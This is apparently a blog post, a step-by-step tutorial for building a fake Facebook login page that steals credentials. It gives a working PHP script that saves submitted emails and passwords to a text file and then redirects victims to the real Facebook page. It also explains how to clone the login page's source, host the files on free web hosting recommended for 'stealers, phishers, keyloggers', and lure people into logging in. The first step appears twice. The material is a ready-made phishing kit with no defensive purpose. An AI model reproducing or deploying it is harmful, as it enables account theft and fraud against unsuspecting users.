FaceBook Phishing (Easiest Tutorial)
Creating FB Fake Page Just Follow The Steps.
STEP 1:Creating Phishing.php file :
1. simply copy the following script and save it as phishing.php
<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["pass"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle); header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit; ?> </body></html>
STEP 2: Creating index.html page :
video tutorial:
Creating FB Fake Page Just Follow The Steps.
STEP 1:Creating Phishing.php file :
1. simply copy the following script and save it as phishing.php
<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["pass"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle); header("Location: https://www.facebook.com/login.php?login_attempt=1"); exit; ?> </body></html>
STEP 2: Creating index.html page :
2.1 Open the Facebook login page then, Right click>View page source and paste it in notepad and save it as
index.html .
2.2 Open that index.html file with a Notepad and search (By pressing Ctrl+F) for :"action" in it and replace the highlighted part (as in the following screenshot) with phishing.php .
Now you have all the following three files with you :
1. phishing.php
2. index.html
3. password.txt
If you don't have your own web hosting account, goto any free web-hosting site www.phpzilla.net ,and in file manager, upload all the three files.
Use any Free web hosting Mostly of them will BAN you. m Using Freehostingnoads.net for Stealers , Phishers , keyloggers etc.
Your
fake page is now ready! With the Domain Name you registered on the
Web-hosting site ask anyone to login and then check your password.txt
file .You will find the Username and Password of that person stored in
it.Also the person gets redirected to the original Facebook login page
and he/she thinks that there must be some problem or he/she may have
entered wrong Username or Password.
This is The Easiest and Simple Way to make FB Fake Page.video tutorial:
Post a Comment